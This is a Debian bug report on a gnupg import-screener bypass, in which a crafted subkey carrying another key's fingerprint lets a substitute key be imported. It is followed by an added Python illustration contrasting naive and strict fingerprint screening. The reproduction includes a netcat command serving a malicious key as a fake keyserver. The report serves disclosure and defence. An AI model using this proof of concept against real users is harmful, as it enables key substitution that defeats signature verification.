[pkg-gnupg-maint] Bug#909755: gnupg: import screener bypass via crafted subkey
Jakub Wilk
jwilk at jwilk.net
Thu Sep 27 18:37:08 BST 2018
Package: gnupg
Version: 2.1.18-8~deb9u2
Tags: security
To fix #725411, an import screener was implemented, which rejects keys
with fingerprints other than those that were requested by the user.
Unfortunately, it's possible to bypass the import screener by appending
a crafted subkey to an arbitrary key:
$ gpg --keyserver keyserver.ubuntu.com --recv-key 0EE5BE979282D80B9F7540F1CCD2ED94D21739E9
gpg: key CCD2ED94D21739E9: public key "Daniel Kahn Gillmor <dkg at fifthhorseman.net>" imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg: imported: 1
$ (printf 'HTTP/1.0 200 OK\n\n'; cat fakeCCD2ED94D21739E9.pgp) | nc.openbsd -N -l -p 11371 > /dev/null & # poor man's malicious key server
$ gpg --keyserver localhost --recv-key 0EE5BE979282D80B9F7540F1CCD2ED94D21739E9
gpg: key 60B0EEAA28CB19E1: "Totally Legit Signing Key <mallory at example.org>" not changed
gpg: Total number processed: 1
gpg: unchanged: 1
$ gpg --list-packets fakeCCD2ED94D21739E9.pgp | tail -n6
# off=402 ctb=b9 tag=14 hlen=3 plen=525
:public sub key packet:
version 4, algo 1, created 1180812858, expires 0
pkey[0]: [4096 bits]
pkey[1]: [17 bits]
keyid: CCD2ED94D21739E9
The subkey was made by taking the original key's public key and changing
the packet's tag, so it has the same fingerprint as the original key.
-- System Information:
Architecture: amd64
Versions of packages gnupg depends on:
ii gnupg-agent 2.1.18-8~deb9u2
ii libassuan0 2.4.3-2
ii libbz2-1.0 1.0.6-8.1
ii libc6 2.24-11+deb9u3
ii libgcrypt20 1.7.6-2+deb9u3
ii libgpg-error0 1.26-2
ii libksba8 1.3.5-2
ii libreadline7 7.0-3
ii libsqlite3-0 3.16.2-5+deb9u1
ii zlib1g 1:1.2.8.dfsg-5
Versions of packages gnupg recommends:
ii dirmngr 2.1.18-8~deb9u2
pn gnupg-l10n <none>
--
Jakub Wilk
-------------- next part --------------
A non-text attachment was scrubbed...
Name: fakeCCD2ED94D21739E9.pgp
Type: application/octet-stream
Size: 930 bytes
Desc: not available
URL: <http://alioth-lists.debian.net/pipermail/pkg-gnupg-maint/attachments/20180927/7a6bab81/attachment.obj>
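As an added illustration of the point in the report above (the re-tagged packet keeps the original key's fingerprint, so a screener that accepts a match on any key packet is fooled), the following Python is example code written for this page, not GnuPG's own implementation. It builds constructed, non-functional v4 RSA key packets, computes their RFC 4880 v4 fingerprints, and contrasts a naive screener that matches any key packet against one that only accepts a match on the tag-6 primary key. All key material, the function names (`naive_screener`, `strict_screener`, and so on) and the two-packet key block are constructed for the demonstration.

```python
import hashlib
import struct

TAG_PUBLIC_KEY = 6      # old-format ctb 0x99 with a two-octet length
TAG_PUBLIC_SUBKEY = 14  # old-format ctb 0xb9 with a two-octet length


def mpi(n: int) -> bytes:
    """Encode an integer as an OpenPGP MPI: two-octet bit count, then big-endian magnitude."""
    bitlen = n.bit_length()
    return struct.pack(">H", bitlen) + n.to_bytes((bitlen + 7) // 8, "big")


def v4_key_body(created: int, n: int, e: int) -> bytes:
    """Body of a version-4 RSA public key packet; the layout is identical for tag 6 and tag 14."""
    return b"\x04" + struct.pack(">I", created) + b"\x01" + mpi(n) + mpi(e)


def old_format_packet(tag: int, body: bytes) -> bytes:
    """Wrap a body in an old-format header with a two-octet length (length type 1)."""
    if len(body) >= 0x10000:
        raise ValueError("body too long for a two-octet length")
    return bytes([0x80 | (tag << 2) | 1]) + struct.pack(">H", len(body)) + body


def parse_packets(data: bytes):
    """Yield (tag, body) for each packet; old- and new-format headers, no partial lengths."""
    i = 0
    while i < len(data):
        ctb = data[i]
        if not ctb & 0x80:
            raise ValueError("invalid packet header at offset %d" % i)
        if ctb & 0x40:  # new-format header
            tag = ctb & 0x3F
            first = data[i + 1]
            if first < 192:
                length, hlen = first, 2
            elif first < 224:
                length, hlen = ((first - 192) << 8) + data[i + 2] + 192, 3
            elif first == 255:
                length, hlen = struct.unpack(">I", data[i + 2:i + 6])[0], 6
            else:
                raise ValueError("partial body lengths not supported")
        else:  # old-format header: tag in bits 5..2, length type in bits 1..0
            tag = (ctb >> 2) & 0x0F
            ltype = ctb & 0x03
            if ltype == 0:
                length, hlen = data[i + 1], 2
            elif ltype == 1:
                length, hlen = struct.unpack(">H", data[i + 1:i + 3])[0], 3
            elif ltype == 2:
                length, hlen = struct.unpack(">I", data[i + 1:i + 5])[0], 5
            else:
                length, hlen = len(data) - i - 1, 1  # indeterminate: rest of input
        body = data[i + hlen:i + hlen + length]
        if len(body) != length:
            raise ValueError("truncated packet at offset %d" % i)
        yield tag, body
        i += hlen + length


def v4_fingerprint(body: bytes) -> str:
    """RFC 4880 12.2: SHA-1 over 0x99, two-octet body length, body. The packet tag is not hashed."""
    return hashlib.sha1(b"\x99" + struct.pack(">H", len(body)) + body).hexdigest().upper()


def key_id(fingerprint: str) -> str:
    """A v4 key ID is the low 64 bits (last 16 hex digits) of the fingerprint."""
    return fingerprint[-16:]


def naive_screener(keyblock: bytes, wanted: str) -> bool:
    """Accept if ANY key packet, primary or subkey, carries the requested fingerprint."""
    return any(v4_fingerprint(body) == wanted
               for tag, body in parse_packets(keyblock)
               if tag in (TAG_PUBLIC_KEY, TAG_PUBLIC_SUBKEY))


def strict_screener(keyblock: bytes, wanted: str) -> bool:
    """Accept only if the primary key packet (tag 6) carries the requested fingerprint."""
    for tag, body in parse_packets(keyblock):
        if tag == TAG_PUBLIC_KEY:
            return v4_fingerprint(body) == wanted
    return False  # a block with no primary key is never acceptable


# Constructed key material: these moduli are arbitrary odd integers, not real RSA keys.
VICTIM_BODY = v4_key_body(1180812858, (1 << 511) | 0x1234567, 65537)
MALLORY_BODY = v4_key_body(1538066228, (1 << 511) | 0xDEADBEEF, 65537)

# The genuine key block (user ID and signature packets omitted; the screener ignores them).
VICTIM_KEY = old_format_packet(TAG_PUBLIC_KEY, VICTIM_BODY)
REQUESTED = v4_fingerprint(VICTIM_BODY)  # what the user passes to --recv-key

# The shape of block the report describes: someone else's primary key, followed by the
# victim's key body re-tagged from 6 to 14. Its fingerprint and key ID do not change.
CRAFTED_KEYBLOCK = (old_format_packet(TAG_PUBLIC_KEY, MALLORY_BODY)
                    + old_format_packet(TAG_PUBLIC_SUBKEY, VICTIM_BODY))

if __name__ == "__main__":
    print("requested fingerprint:", REQUESTED, "key id:", key_id(REQUESTED))
    print("naive screener accepts crafted block: ", naive_screener(CRAFTED_KEYBLOCK, REQUESTED))
    print("strict screener accepts crafted block:", strict_screener(CRAFTED_KEYBLOCK, REQUESTED))
```

The fingerprint hash covers a fixed 0x99 prefix and the packet body whatever the packet's tag is, which is why re-tagging a primary key as a subkey leaves both the fingerprint and the derived key ID untouched; the only robust rule for a screener is therefore to compare the requested fingerprint against the primary key packet alone. A screener that also wants to let users request a subkey fingerprint would additionally have to verify the subkey binding signature issued by the primary key before trusting that subkey's membership in the block.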